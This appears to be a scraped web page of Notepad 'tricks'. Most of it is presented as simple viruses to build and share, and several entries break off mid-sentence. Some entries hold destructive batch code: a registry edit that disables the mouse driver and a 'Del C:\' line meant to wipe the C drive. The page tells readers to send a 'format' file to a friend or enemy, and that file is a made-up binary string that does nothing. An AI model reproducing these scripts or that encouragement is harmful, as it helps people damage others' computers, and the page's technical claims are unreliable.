Is your antivirus working perfect ?

  This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer. First open Notepad and copy below code into it. X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*  Save the file as virus.exe

Make a virus that disable Mouse

  we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself. Open Notepad and copy below codes rem ——————————— rem Disable Mouse set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass” reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem ——————————— Save this file as  virus.bat Done you just created

Virus to Format Hard Disk !!!

Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try thison your own computer or else you will end up formatting your own computer. Copy the below codes into Notepad. 01001011000111110010010101010101010000011111100000 Save the file as Format.exe You have created your

Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer. 1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y 2. Then Save this file as virus.bat

Dancing Keyboard Led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script. 1. Open Notepad and copy below codes into it. Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” wshshell.sendkeys “{SCROLLLOCK}” loop 2. Then save this file as dance.vbs (name can be anything

Make your computer talk what you type !

This is very good and interesting javascript trick which let your computer speaks whatever you type. There is no requirement of any software. Just follow belowsimple steps. First open Notepad and copy below codes Dim msg, sapi msg=InputBox(“Enter your text for conversion–www.aktricks.com“,”aneesh kansal Text-To-Audio Converter”) set sapi=CreateObject(“sapi.spvoice”) sapi.Speak msg Now save the notepad file as talk.vbs Now close the notepad

Create multiple icons with no name and folders with no icon.

To create an icon with no name attached: Make sure NumLock is on Highlight the Icon you want to change Right-Mouse click and select Rename While holding down the Alt key, type 0160 Now the icon will have no name below it. To create multiple icons with no name :: Follow directions detailed above With the second icon simply

Shutdown , reboot ,logoff , hibernate , restart from an icon on dekstop

1. Right-click on an empty area on the desktop. You’ll see a menu. In the menu, select New, and then Shortcut. 2. Click on Shortcut. The “Create Shortcut” Wizard will pop up. 3. Where it asks you to type the location of the item, type the following: shutdown -s -t 05   here 00 is